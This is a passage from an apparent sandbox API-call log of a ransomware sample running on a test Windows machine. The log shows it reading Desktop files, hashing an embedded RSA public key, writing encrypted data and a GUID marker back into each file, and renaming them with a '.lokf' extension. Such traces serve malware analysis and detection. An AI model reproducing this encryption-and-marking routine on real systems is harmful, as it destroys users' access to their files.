hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ae90 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3298de8 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.549] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c82710*, nNumberOfBytesToWrite=0x5821, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c82710*, lpNumberOfBytesWritten=0x9f4fb14*=0x5821, lpOverlapped=0x0) returned 1 [0058.549] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0058.549] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5826, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.549] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.550] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.550] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.550] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.550] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.550] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.550] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.550] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.550] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.550] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.550] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.550] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.550] CloseHandle (hObject=0x5cc) returned 1 [0058.551] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x3269478 [0058.551] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.551] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269478 | out: hHeap=0x660000) returned 1 [0058.551] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\faub8t.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\faub8t.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\faub8t.flv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\faub8t.flv.lokf")) returned 1 [0058.551] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.551] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.551] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.552] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.552] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbaa128e0, ftCreationTime.dwHighDateTime=0x1d4c969, ftLastAccessTime.dwLowDateTime=0x54f95d30, ftLastAccessTime.dwHighDateTime=0x1d4cc77, ftLastWriteTime.dwLowDateTime=0x54f95d30, ftLastWriteTime.dwHighDateTime=0x1d4cc77, nFileSizeHigh=0x0, nFileSizeLow=0xc34a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FhecmqmUmuGofO.jpg", cAlternateFileName="FHECMQ~1.JPG")) returned 1 [0058.552] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.552] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.552] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.552] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FhecmqmUmuGofO.jpg") returned=".jpg" [0058.552] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FhecmqmUmuGofO.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fhecmqmumugofo.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.553] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=49994) returned 1 [0058.553] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.555] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc324, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.555] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.556] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.556] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.556] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xc34a, lpOverlapped=0x0) returned 1 [0058.556] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.556] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0058.556] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.556] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0058.556] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b89c8) returned 1 [0058.557] CryptCreateHash (in: hProv=0x6b89c8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0058.557] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0058.557] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.557] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.557] GetLastError () returned 0x0 [0058.557] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.557] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.557] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.557] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.557] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.557] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.557] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc350) returned 0x9c82710 [0058.558] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298de8 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ae90 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298e30 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aea8 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aed8 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aef0 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0058.558] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0058.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aed8 | out: hHeap=0x660000) returned 1 [0058.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aef0 | out: hHeap=0x660000) returned 1 [0058.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.558] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aef0 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6aed8 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.558] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aef0 | out: hHeap=0x660000) returned 1 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aed8 | out: hHeap=0x660000) returned 1 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.559] GetCurrentThreadId () returned 0x9e0 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c2ff0 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.559] GetCurrentThreadId () returned 0x9e0 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.559] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.559] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aed8 [0058.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aef0 [0058.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0058.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6aec0 [0058.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.560] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.560] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6af08 [0058.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0058.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6aed8 | out: hHeap=0x660000) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6aed8 [0058.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3296fa8 [0058.561] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.561] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xc34a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.561] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.562] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.562] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.562] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.562] CloseHandle (hObject=0x5cc) returned 1 [0058.563] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FhecmqmUmuGofO.jpg" (normalized: "c:\\users\\5p5nrgjn0js 